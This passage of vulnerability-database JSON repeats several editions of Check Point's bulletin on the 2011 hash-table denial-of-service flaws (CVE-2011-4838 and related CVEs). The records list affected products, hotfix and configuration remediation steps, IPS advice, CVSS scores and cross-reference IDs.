"redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0093", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-16T23:11:50", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-16T23:11:50", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-16T23:11:50", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-17T11:09:07", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815", "CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:30001", "SSV:26121", "SSV:26122", "SSV:72454", "SSV:30071"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:831554", "OPENVAS:863681", "OPENVAS:870539", "OPENVAS:881167", "OPENVAS:881226", "OPENVAS:70754", "OPENVAS:136141256231070735", "OPENVAS:863921", "OPENVAS:1361412562310863963", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310122002", "OPENVAS:881149", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310120218", "OPENVAS:870638", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863735", "OPENVAS:136141256231071568", "OPENVAS:881075", "OPENVAS:1361412562310831554"]}, {"type": "nessus", "idList": ["FEDORA_2011-17551.NASL", "FEDORA_2011-17542.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-0504.NASL", "REDHAT-RHSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "DEBIAN_DLA-209.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "SOLARIS11_RUBY_20120417.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2012-1262.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-1301.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:76D5120DE0", "FEDORA:3515C213E6", "FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-17T11:09:07", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-17T11:09:07", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-17T11:09:07", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-17T15:15:24", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4815", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:30001", "SSV:72454", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:881167", "OPENVAS:1361412562310122001", "OPENVAS:870638", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881149", "OPENVAS:863681", "OPENVAS:70754", "OPENVAS:881142", "OPENVAS:1361412562310831554", "OPENVAS:863954", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863681", "OPENVAS:71568", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310881226", "OPENVAS:831554", "OPENVAS:1361412562310881075", "OPENVAS:863735", "OPENVAS:1361412562310863921", "OPENVAS:863742", "OPENVAS:1361412562310881095", "OPENVAS:863921", "OPENVAS:136141256231071568", "OPENVAS:863824"]}, {"type": "nessus", "idList": ["SL_20120130_RUBY_ON_SL4_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "REDHAT-RHSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0504.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2011-17551.NASL", "CENTOS_RHSA-2012-0070.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0092", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:6097820D6A", "FEDORA:6D55C20D95", "FEDORA:76D5120DE0", "FEDORA:4930D21410"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-041"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-17T15:15:24", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-17T15:15:24", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-17T15:15:24", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-18T11:26:38", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4815", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:30001", "SSV:72454", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:881167", "OPENVAS:1361412562310122001", "OPENVAS:870638", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881149", "OPENVAS:863681", "OPENVAS:70754", "OPENVAS:881142", "OPENVAS:1361412562310831554", "OPENVAS:863954", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863681", "OPENVAS:71568", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310881226", "OPENVAS:831554", "OPENVAS:1361412562310881075", "OPENVAS:863735", "OPENVAS:1361412562310863921", "OPENVAS:863742", "OPENVAS:1361412562310881095", "OPENVAS:863921", "OPENVAS:136141256231071568", "OPENVAS:863824"]}, {"type": "nessus", "idList": ["SL_20120130_RUBY_ON_SL4_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "REDHAT-RHSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0504.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2011-17551.NASL", "CENTOS_RHSA-2012-0070.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0092", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:6097820D6A", "FEDORA:6D55C20D95", "FEDORA:76D5120DE0", "FEDORA:4930D21410"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-041"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-17T15:15:24", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-17T15:15:24", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-18T11:26:38", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", 